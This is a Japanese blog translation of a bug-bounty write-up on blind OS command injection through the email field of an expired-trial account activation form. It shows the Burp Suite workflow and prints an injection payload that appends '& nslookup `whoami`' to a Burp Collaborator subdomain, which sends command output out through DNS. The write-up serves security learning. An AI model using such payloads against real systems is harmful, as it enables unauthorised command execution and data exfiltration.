Shikata Ga Nai

Private? There is no such things.

Blind OS Command Injection via Activation Requestを訳してみた

Hello there, ('ω')ノ

 

アクティブ化リクエストによるブラインド OS コマンド インジェクションを。

 

脆弱性:

 OS コマンド インジェクション

 

記事:

 https://medium.com/@alb-soul/blind-os-command-injection-via-activation-request-66dc25377bf4

 

今回は、アカウント アクティベーション リクエストを通じて

ブラインド OS コマンド インジェクションの脆弱性を発見した方法を。

 

OS コマンド インジェクションは、攻撃者がサーバに対して

オペレーティング システム (OS) コマンドを実行できるようにする

Web セキュリティの脆弱性で。

ping、echo などの OS コマンドでインジェクションされた際の

リクエストの応答で示され。

ブラインド OS コマンド インジェクションでは、サイトが脆弱な場合がありますが、

ターゲットが脆弱な場合は応答は表示されず。

ただし、Burp Suiteのコラボレータまたはリスナーによって検出することはできて。

 

今回、トライアルアカウントの有効期限が切れたときに、

アカウントアクティベーションリクエストフォームのメールアドレスと

電話番号フィールドで脆弱性が発生して。

 

実証実験:

有効期限が切れたアカウントでログインすると、

ダッシュボードにアクセスできなくなり、代わりにサービスを購入するための

電子メールと電話番号のフィールドが表示されたポップアップ アラートが

表示されて。

 

トライアルの有効期限が切れた場合に、

アカウントのアクティベーション要求に対して発生するポップ アップ

 

次に、電子メールと電話番号を入力し、[連絡先] ボタンをクリックして

アクティベーション リクエストを送信して。

Burpsuiteでは、以下のようにリクエスト履歴をRepeaterに送信して。

 

アカウント有効化のためのHTTPリクエスト

 

応答に時間遅延があるかどうかを確認するために、ping -c 10 127.0.0.1 のような

OS コマンドを挿入しようとしましたが、確認できず。

次に、このペイロードを使用して emailAddress 値を挿入して。

 mymail@mail.com & nslookup

 

burpcollaborator_site_payload、Burp コラボレータ サイトのペイロードは

右クリック ⇨ コラボレータ ペイロードの挿入で生成できるため、

次のようになって。

 

“emailAddress”:”mymail@mail.com & nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN &


ペイロードとともに送信された後

 

ペイロードを送信した後、応答には脆弱性があるかどうかは示されませんが、

[コラボレータ] タブに移動して、 [今すぐポーリング] ボタンをクリックすると

ペイロードがトリガーされて。

 

 

Best regards, (^^ゞ